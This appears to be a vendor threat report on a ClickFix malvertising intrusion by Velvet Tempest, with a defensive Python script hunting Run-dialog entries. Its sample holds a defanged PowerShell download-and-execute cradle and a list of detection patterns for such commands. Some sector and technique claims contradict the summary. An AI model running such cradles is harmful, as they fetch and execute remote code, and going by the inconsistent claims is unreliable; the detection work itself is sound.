Executive Summary
Between February 3 and 16, 2026, the threat group Velvet Tempest (also known as DEV-0504) conducted a sophisticated cyber intrusion targeting a U.S. non-profit organization with over 3,000 endpoints and 2,500 users. Utilizing a malvertising campaign, they employed the 'ClickFix' technique, deceiving victims into executing obfuscated commands via the Windows Run dialog. This led to the deployment of DonutLoader and the CastleRAT backdoor, facilitating credential harvesting and extensive reconnaissance. Notably, while Velvet Tempest is known for deploying various ransomware strains, including Ryuk, REvil, and Conti, the Termite ransomware was not executed in this particular incident. (bleepingcomputer.com)
This incident underscores the evolving tactics of ransomware affiliates, highlighting the use of social engineering techniques like 'ClickFix' to gain initial access. The absence of immediate ransomware deployment suggests a strategic shift towards prolonged network infiltration and data exfiltration, posing significant challenges for detection and mitigation.
Why This Matters Now
The Velvet Tempest intrusion highlights the increasing sophistication of ransomware affiliates employing deceptive techniques like 'ClickFix' to infiltrate networks. Organizations must enhance their defenses against such social engineering tactics to prevent potential data breaches and operational disruptions.
Attack Path Analysis
Velvet Tempest initiated the attack by employing a malvertising campaign that led victims to execute an obfuscated command, granting initial access. They then escalated privileges by harvesting credentials stored in Chrome using a PowerShell script. Subsequently, they moved laterally within the network, performing Active Directory reconnaissance and host discovery. For command and control, they deployed the CastleRAT backdoor to maintain persistent access. While data exfiltration was not explicitly observed, the deployment of CastleRAT suggests potential for such activity. Ultimately, the attack did not culminate in ransomware deployment, indicating a possible focus on establishing long-term access or data theft.
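Commands typed into the Windows Run dialog, the ClickFix entry point described above, are recorded under the user's RunMRU registry key, which gives defenders a cheap artifact for hunting this kind of initial access. The triage routine below is an added example, not code from the article or from any vendor; the RunMRU export it scans is constructed and defanged.

```python
import re

# Constructed sample of a RunMRU export (HKCU\Software\Microsoft\Windows\
# CurrentVersion\Explorer\RunMRU). Explorer stores each Run-dialog entry as a
# string value named a, b, c, ... terminated by "\1", and MRUList gives the
# most-recent-first order. All values below are made up and defanged.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "mstsc /v:fileserver01\\1",
    "c": 'powershell -w hidden -c "iex (irm hxxp://example.invalid/v)"  # I am not a robot\\1',
}

# Indicators typical of ClickFix paste-and-run lures: an interpreter launched
# from the Run dialog with hiding or encoding flags, a download cradle, and
# CAPTCHA-style text appended so the pasted command looks legitimate.
SUSPICIOUS_PATTERNS = [
    (r"\b(powershell|pwsh|mshta|cmd|wscript|cscript)\b", "interpreter launched from Run dialog"),
    (r"-w(indowstyle)?\s+hidden", "hidden window flag"),
    (r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "base64-encoded command"),
    (r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|curl|bitsadmin)\b", "download-and-execute cradle"),
    (r"https?://|hxxp", "URL in Run command"),
    (r"i am not a robot|captcha|verification", "CAPTCHA-style lure text"),
]


def parse_runmru(values):
    """Return Run-dialog commands as (value_name, command), most recent first."""
    entries = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is None:
            continue
        # strip the trailing "\1" marker Explorer appends to each entry
        entries.append((name, raw[:-2] if raw.endswith("\\1") else raw))
    return entries


def triage_runmru(values, min_hits=2):
    """Flag entries matching at least min_hits indicators; returns (name, cmd, reasons) tuples."""
    findings = []
    for name, cmd in parse_runmru(values):
        reasons = [why for pat, why in SUSPICIOUS_PATTERNS if re.search(pat, cmd, re.IGNORECASE)]
        if len(reasons) >= min_hits:
            findings.append((name, cmd, reasons))
    return findings


if __name__ == "__main__":
    for name, cmd, reasons in triage_runmru(SAMPLE_RUNMRU):
        print(f"[{name}] {cmd}\n    -> {', '.join(reasons)}")
```

On a live host the values would come from a registry export or Get-ItemProperty on the RunMRU key; here they are embedded so the script runs offline.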
Kill Chain Progression
Initial Compromise
Description
Velvet Tempest gained initial access through a malvertising campaign that led victims to execute an obfuscated command via the Windows Run dialog.
MITRE ATT&CK® Techniques
- Spearphishing Attachment
- Malicious File
- PowerShell
- Valid Accounts
- Domain Group
- LSASS Memory
- Dynamic-link Library Injection
- Data Encrypted for Impact
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Malware Protection
Control ID: 6.2.3
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – Identity and Access Management
Control ID: 3.1
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Non-Profit/Volunteering
Termite ransomware specifically targeted a non-profit with 3,000+ endpoints using ClickFix social engineering, requiring enhanced egress security and zero trust segmentation controls.
Health Care / Life Sciences
Ransomware attacks on medical centers closing clinics demand HIPAA-compliant encrypted traffic, threat detection, and data exfiltration prevention to protect patient operations.
Information Technology/IT
Velvet Tempest's DonutLoader and CastleRAT deployment through legitimate Windows utilities necessitates advanced anomaly detection and Kubernetes security for service providers.
Financial Services
Multi-stage malware campaigns bypassing traditional defenses require PCI-compliant multicloud visibility, inline IPS protection, and comprehensive east-west traffic security monitoring.
Sources
- Termite ransomware breaches linked to ClickFix CastleRAT attacks: https://www.bleepingcomputer.com/news/security/termite-ransomware-breaches-linked-to-clickfix-castlerat-attacks/
- Termite ransomware breaches linked to ClickFix CastleRAT attacks: https://www.hendryadrian.com/termite-ransomware-breaches-linked-to-clickfix-castlerat-attacks/
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Aviatrix Zero Trust CNSF is pertinent to this incident as it could have limited the attacker's ability to move laterally and maintain persistent access, thereby reducing the overall blast radius.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: The attacker's initial access may have been constrained, reducing the likelihood of successful exploitation.
Control: Zero Trust Segmentation
Mitigation: The attacker's ability to escalate privileges could have been limited, reducing the scope of unauthorized access.
Control: East-West Traffic Security
Mitigation: The attacker's lateral movement within the network could have been constrained, reducing the spread of the attack.
Control: Multicloud Visibility & Control
Mitigation: The establishment of persistent command and control channels could have been limited, reducing the attacker's ability to maintain access.
Control: Egress Security & Policy Enforcement
Mitigation: Potential data exfiltration activities could have been constrained, reducing the risk of data loss.
The overall impact of the attack could have been limited, reducing the potential for long-term access or data theft.
Impact at a Glance
Affected Business Functions
- IT Service Management
- User Support Services
- Data Security
- Network Operations
Estimated downtime: 14 days
Estimated loss: $500,000
Potential exposure of sensitive organizational data, including user credentials and internal communications.
Recommended Actions
Key Takeaways & Next Steps
- Implement Zero Trust Segmentation to restrict lateral movement and limit the attacker's ability to traverse the network.
- Enhance Threat Detection & Anomaly Response capabilities to identify and respond to suspicious activities, such as unauthorized credential harvesting.
- Deploy Egress Security & Policy Enforcement to monitor and control outbound traffic, preventing potential data exfiltration.
- Utilize Multicloud Visibility & Control to gain comprehensive insights into network activities across cloud environments, aiding in the detection of command and control communications.
- Regularly update and enforce security policies to mitigate risks associated with malvertising and social engineering tactics used for initial compromise.